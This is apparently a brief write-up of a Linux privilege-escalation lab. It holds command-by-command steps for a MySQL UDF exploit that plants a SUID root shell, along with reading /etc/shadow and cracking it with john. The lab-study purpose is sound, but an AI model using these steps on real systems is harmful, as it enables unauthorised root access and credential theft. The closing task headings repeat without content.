Task 1 - Deploy the Vulnerable Debian VM

Username : user
Password : password321

Facing this error Unable to negotiate with 10.10.63.119 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss Adding oHostKeyAlgorithms

ssh -oHostKeyAlgorithms=+ssh-dss user@TARGET_IP

Task 2 - Service Exploits

https://www.exploit-db.com/exploits/1518

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Connect to the MySQL service as the root user with a blank password:

mysql -u root

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Exit out of the MySQL shell and run /tmp/rootbashexecutable with-p` to gain a shell running with root privileges:

/tmp/rootbash -p

Task 3 - Readable `/etc/shadow`

cat /etc/shadow

john passwd --wordlist=/usr/share/wordlists/rockyou.txt

Task 4 - Writable `/etc/shadow`

Task 1 - Deploy the Vulnerable Debian VM

Task 2 - Service Exploits

Task 3 - Readable /etc/shadow

Task 4 - Writable /etc/shadow

Task 3 - Readable `/etc/shadow`

Task 4 - Writable `/etc/shadow`